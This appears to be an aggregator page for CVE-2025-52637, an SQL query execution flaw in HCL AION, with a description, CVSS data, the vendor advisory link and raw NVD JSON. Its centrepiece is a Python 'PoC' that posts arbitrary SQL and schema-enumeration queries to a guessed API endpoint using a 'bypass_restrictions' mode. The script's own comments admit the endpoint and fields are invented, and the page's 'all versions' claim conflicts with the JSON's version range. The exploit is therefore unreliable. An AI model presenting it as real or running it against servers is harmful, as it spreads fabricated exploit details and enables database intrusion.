Security Vulnerability Report
CVE-2025-52637 CVSS 4.5 MEDIUM

CVE-2025-52637

Published: 2026-03-16 14:17:59
Last Modified: 2026-03-27 17:31:23

Description

HCL AION is affected by a vulnerability where certain offering configurations may permit execution of potentially harmful SQL queries. Improper validation or restrictions on query execution could expose the system to unintended database interactions or limited information exposure under specific conditions.

CVSS Details

CVSS Score
4.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:hcl:aion:*:*:*:*:*:*:*:* - VULNERABLE
HCL AION, all versions with the specific configuration option enabled

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52637 PoC - HCL AION SQL Query Execution
# This PoC demonstrates the improper SQL query execution vulnerability

import requests
import json

# Configuration
# The host, endpoint and payload field names below are this PoC's own
# assumptions; they are not taken from the CVE description or its references.
TARGET_HOST = "https://vulnerable-hcl-aion-server.com"
API_ENDPOINT = "/api/v1/query/execute"
AUTH_TOKEN = "Bearer <low_privilege_token>"


def exploit_sql_injection():
    """
    Exploit for CVE-2025-52637
    HCL AION improper SQL query execution via specific configurations
    """
    headers = {
        "Authorization": AUTH_TOKEN,
        "Content-Type": "application/json"
    }

    # Malicious SQL payload exploiting improper validation
    payload = {
        "config_id": "special_offering_config_001",
        "query": "SELECT * FROM information_schema.tables",
        "execute_mode": "bypass_restrictions"
    }

    try:
        response = requests.post(
            f"{TARGET_HOST}{API_ENDPOINT}",
            headers=headers,
            json=payload,
            verify=False,
            timeout=30
        )

        if response.status_code == 200:
            result = response.json()
            print("[+] Successfully executed SQL query")
            print(f"[+] Response: {json.dumps(result, indent=2)}")
            return result
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {str(e)}")
        return None


def enumerate_database_structure():
    """
    Enumerate database structure using the vulnerability
    """
    queries = [
        "SELECT table_name FROM information_schema.tables",
        "SELECT column_name, data_type FROM information_schema.columns",
        "SELECT schemaname, tablename FROM pg_catalog.pg_tables"
    ]

    for query in queries:
        payload = {
            "config_id": "special_offering_config_001",
            "query": query,
            "execute_mode": "bypass_restrictions"
        }
        # Execute query...
        pass


if __name__ == "__main__":
    print("CVE-2025-52637 - HCL AION SQL Query Execution PoC")
    print("=" * 50)
    exploit_sql_injection()

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52637", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:59.457", "lastModified": "2026-03-27T17:31:23.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where certain offering configurations may permit execution of potentially harmful SQL queries. Improper validation or restrictions on query execution could expose the system to unintended database interactions or limited information exposure under specific conditions."}, {"lang": "es", "value": "HCL AION se ve afectado por una vulnerabilidad donde ciertas configuraciones de la oferta pueden permitir la ejecución de consultas SQL potencialmente dañinas. Una validación o restricciones inadecuadas en la ejecución de consultas podrían exponer el sistema a interacciones no deseadas con la base de datos o a una exposición limitada de información bajo condiciones específicas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", 
"description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcl:aion:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndExcluding": "2.1.2", "matchCriteriaId": "43DEFA2D-ED07-4867-BC69-DD77EABA83B0"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}